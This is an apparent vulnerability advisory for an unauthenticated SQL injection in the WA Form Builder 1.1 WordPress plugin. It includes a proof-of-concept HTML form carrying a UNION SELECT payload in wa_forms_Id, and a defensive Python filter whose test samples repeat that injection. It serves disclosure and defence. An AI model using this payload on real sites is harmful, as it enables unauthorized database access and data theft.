WA Form Builder 1.1 - Unauthenticated SQL Injection



Description
$_POST['wa_forms_Id'] is not escaped. WAFormBuilder_ui_output() is accessible to any user.
Proof of Concept
<form method="post" action="http://www.example.com/?p=1">
    <input type="text" name="wa_forms_Id" value="0 UNION SELECT 1,2,3.4,5,6,7,8,9,10,11,12,13,name,15,16,17,slug FROM wp_terms WHERE term_id=1"/>
    <input type="text" name="action" value="insert_data"/>
    <input type="submit">
</form>
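
A request-side check for the parameter described above, written as an added example (it is not code from the advisory or from the plugin). It assumes that legitimate wa_forms_Id values are non-negative integer IDs; php_name(), check_form_id(), MAX_ID_DIGITS and the sample bodies are hypothetical names and constructed data.

```python
from urllib.parse import parse_qsl

PARAM = "wa_forms_Id"   # parameter named in the advisory
MAX_ID_DIGITS = 10      # assumption: form IDs fit a 32-bit integer column


def php_name(key):
    """Approximate the name PHP files a request field under in $_POST."""
    # PHP treats "name[...]" as an array element of "name" and rewrites
    # spaces and dots in field names to underscores.
    return key.split("[", 1)[0].replace(" ", "_").replace(".", "_")


def check_form_id(body):
    """Return (allowed, reason) for one URL-encoded POST body."""
    hits = [(k, v) for k, v in parse_qsl(body, keep_blank_values=True)
            if php_name(k) == PARAM]
    if not hits:
        return True, "parameter absent"
    if len(hits) > 1 or hits[0][0] != PARAM:
        return False, "repeated or non-canonical parameter name"
    value = hits[0][1]
    # Allow-list: ASCII digits only. isdigit() alone also accepts
    # non-ASCII digit characters, hence the isascii() guard.
    if value.isascii() and value.isdigit() and len(value) <= MAX_ID_DIGITS:
        return True, "integer id"
    return False, "non-integer value"


# Constructed sample bodies; the second is shortened from the PoC above.
SAMPLES = [
    "wa_forms_Id=7&action=insert_data",
    "wa_forms_Id=0+UNION+SELECT+1&action=insert_data",
    "wa_forms_Id%5B%5D=7&action=insert_data",
    "wa_forms_Id=&action=insert_data",
    "action=insert_data",
]


def run_samples():
    return [check_form_id(body) for body in SAMPLES]


if __name__ == "__main__":
    for body, (allowed, reason) in zip(SAMPLES, run_samples()):
        print("ALLOW" if allowed else "BLOCK", reason, "<-", body)
```

A filter like this only narrows what reaches the plugin. The query itself still needs the value bound as an integer, which in WordPress is done with $wpdb->prepare() and a %d placeholder.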

Affects Plugin

References

URL http://lenonleite.com.br/en/blog/2016/11/29/wa-form-builder-1-1-sql-injection/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br
Submitter Twitter lenonleite
Verified No
WPVDB ID 8687

Timeline

Publicly Published 2016-12-05 (almost 3 years ago)
Added 2016-12-06 (almost 3 years ago)
Last Updated 2016-12-06 (almost 3 years ago)
